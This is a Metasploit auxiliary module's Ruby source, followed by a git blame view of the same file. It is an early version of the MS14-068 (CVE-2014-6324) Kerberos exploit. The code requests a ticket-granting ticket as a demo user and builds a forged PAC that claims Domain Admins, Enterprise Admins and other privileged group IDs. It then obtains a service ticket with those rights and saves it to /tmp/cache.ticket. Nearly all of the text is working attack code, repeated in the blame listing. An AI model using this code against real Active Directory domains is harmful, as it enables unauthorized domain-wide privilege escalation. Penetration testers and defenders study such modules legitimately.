metasploit-framework/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit4 < Msf::Auxiliary

  include Msf::Kerberos::Client

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Dummy Kerberos testing module',
      'Description' => %q{
        Dummy Kerberos testing module
      },
      'Author' =>
        [
          'Tom Maddock', # Vulnerability discovery
          'Sylvain Monne', # pykek framework and exploit
					'juan vazquez' # Metasploit module
        ],
      'References' =>
        [
          ['CVE', '2014-6324'],
          ['MSB', 'MS14-068'],
          ['OSVDB', '114751'],
          ['URL', 'http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx'],
          ['URL', 'https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/'],
          ['URL', 'https://github.com/bidord/pykek']
        ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Nov 18 2014'
    ))
  end

  def run

		connect(:rhost => datastore['RHOST'])
    print_status("Sending AS-REQ...")

    my_key = OpenSSL::Digest.digest('MD4', Rex::Text.to_unicode('juan'))

    pre_auth = []
    pre_auth << build_as_pa_time_stamp(key: my_key)
    pre_auth << build_pa_pac_request
    pre_auth

    res = send_request_as(
      client_name: 'juan',
      server_name: 'krbtgt/DEMO.LOCAL',
      realm: 'DEMO.LOCAL',
      key: my_key,
      pa_data: pre_auth
    )

    unless res.msg_type == 11
      print_error("invalid response :(")
      return
    end

    print_good("good answer!")
    print_status("Parsing AS-REP...")

    session_key = extract_session_key(res, my_key)
    logon_time = extract_logon_time(res, my_key)

    ticket = res.ticket

    print_status("Sending TGS-REQ...")

    pre_auth = []
    pre_auth << build_pa_pac_request

    pac = build_pac(
      client_name: 'juan',
      group_ids: [513, 512, 520, 518, 519],
      domain_id: 'S-1-5-21-1755879683-3641577184-3486455962',
      realm: 'DEMO.LOCAL',
      logon_time: logon_time,
    )

    auth_data = build_pac_authorization_data(pac: pac)

    res = send_request_tgs(
      client_name: 'juan',
      server_name: 'krbtgt/DEMO.LOCAL',
      realm: 'DEMO.LOCAL',
      key: my_key,
      logon_time: logon_time,
      session_key: session_key,
      ticket: ticket,
      group_ids: [513, 512, 520, 518, 519],
      domain_id: 'S-1-5-21-1755879683-3641577184-3486455962',
      auth_data: auth_data,
      pa_data: pre_auth
    )

    unless res.msg_type == 13
      print_error("invalid response :(")
      return
    end

    print_good("Valid TGS-Response")

    cache = extract_kerb_creds(res, 'AAAABBBBCCCCDDDD')

    pp cache

    f = File.new('/tmp/cache.ticket', 'wb')
    f.write(cache.encode)
    f.close
  end
end
Add dummy test module 2014-12-18 01:57:10 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'rex'`

			`class Metasploit4 < Msf::Auxiliary`

Add initial specs for Msf::Kerberos::Client::TgsResponse 2014-12-21 02:29:00 +00:00			`include Msf::Kerberos::Client`
Add dummy test module 2014-12-18 01:57:10 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Dummy Kerberos testing module',`
			`'Description' => %q{`
			`Dummy Kerberos testing module`
			`},`
			`'Author' =>`
			`[`
Add references and authors 2014-12-22 18:34:31 +00:00			`'Tom Maddock', # Vulnerability discovery`
			`'Sylvain Monne', # pykek framework and exploit`
			`'juan vazquez' # Metasploit module`
Add dummy test module 2014-12-18 01:57:10 +00:00			`],`
			`'References' =>`
			`[`
Change module filename 2014-12-22 18:29:28 +00:00			`['CVE', '2014-6324'],`
			`['MSB', 'MS14-068'],`
Add references and authors 2014-12-22 18:34:31 +00:00			`['OSVDB', '114751'],`
			`['URL', 'http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx'],`
			`['URL', 'https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/'],`
			`['URL', 'https://github.com/bidord/pykek']`
Add dummy test module 2014-12-18 01:57:10 +00:00			`],`
			`'License' => MSF_LICENSE,`
Add references and authors 2014-12-22 18:34:31 +00:00			`'DisclosureDate' => 'Nov 18 2014'`
Add dummy test module 2014-12-18 01:57:10 +00:00			`))`
			`end`

			`def run`

			`connect(:rhost => datastore['RHOST'])`
			`print_status("Sending AS-REQ...")`
Build pre auth array out of the mixin 2014-12-20 00:10:14 +00:00
Use options by call 2014-12-20 00:23:11 +00:00			`my_key = OpenSSL::Digest.digest('MD4', Rex::Text.to_unicode('juan'))`

Build pre auth array out of the mixin 2014-12-20 00:10:14 +00:00			`pre_auth = []`
Use options by call 2014-12-20 00:23:11 +00:00			`pre_auth << build_as_pa_time_stamp(key: my_key)`
			`pre_auth << build_pa_pac_request`
Build pre auth array out of the mixin 2014-12-20 00:10:14 +00:00			`pre_auth`

Use options by call 2014-12-20 00:23:11 +00:00			`res = send_request_as(`
			`client_name: 'juan',`
			`server_name: 'krbtgt/DEMO.LOCAL',`
			`realm: 'DEMO.LOCAL',`
			`key: my_key,`
			`pa_data: pre_auth`
			`)`
Add dummy test module 2014-12-18 01:57:10 +00:00
			`unless res.msg_type == 11`
			`print_error("invalid response :(")`
			`return`
			`end`

			`print_good("good answer!")`
			`print_status("Parsing AS-REP...")`

Use options by call 2014-12-20 00:23:11 +00:00			`session_key = extract_session_key(res, my_key)`
			`logon_time = extract_logon_time(res, my_key)`
Add dummy test module 2014-12-18 01:57:10 +00:00
			`ticket = res.ticket`

Use options by call 2014-12-20 00:23:11 +00:00			`print_status("Sending TGS-REQ...")`
Build PAC extensions from the module 2014-12-20 00:47:41 +00:00
Create build_subkey method 2014-12-20 01:46:50 +00:00			`pre_auth = []`
			`pre_auth << build_pa_pac_request`

Build PAC extensions from the module 2014-12-20 00:47:41 +00:00			`pac = build_pac(`
			`client_name: 'juan',`
			`group_ids: [513, 512, 520, 518, 519],`
			`domain_id: 'S-1-5-21-1755879683-3641577184-3486455962',`
			`realm: 'DEMO.LOCAL',`
			`logon_time: logon_time,`
			`)`

Add specs for Msf::Kerberos::Client::Pac 2014-12-21 23:49:36 +00:00			`auth_data = build_pac_authorization_data(pac: pac)`
Build AuthorizationData from the module 2014-12-20 00:58:06 +00:00
Use options by call 2014-12-20 00:23:11 +00:00			`res = send_request_tgs(`
			`client_name: 'juan',`
			`server_name: 'krbtgt/DEMO.LOCAL',`
			`realm: 'DEMO.LOCAL',`
			`key: my_key,`
Add dummy test module 2014-12-18 01:57:10 +00:00			`logon_time: logon_time,`
			`session_key: session_key,`
			`ticket: ticket,`
			`group_ids: [513, 512, 520, 518, 519],`
Build PAC extensions from the module 2014-12-20 00:47:41 +00:00			`domain_id: 'S-1-5-21-1755879683-3641577184-3486455962',`
Create build_subkey method 2014-12-20 01:46:50 +00:00			`auth_data: auth_data,`
			`pa_data: pre_auth`
Add dummy test module 2014-12-18 01:57:10 +00:00			`)`

			`unless res.msg_type == 13`
			`print_error("invalid response :(")`
			`return`
			`end`

			`print_good("Valid TGS-Response")`

Refact extraction of kerberos cache credentials 2014-12-19 21:53:24 +00:00			`cache = extract_kerb_creds(res, 'AAAABBBBCCCCDDDD')`
Add support for cache credentials in the mixin 2014-12-18 22:31:46 +00:00
			`pp cache`

			`f = File.new('/tmp/cache.ticket', 'wb')`
			`f.write(cache.encode)`
			`f.close`
Add dummy test module 2014-12-18 01:57:10 +00:00			`end`
			`end`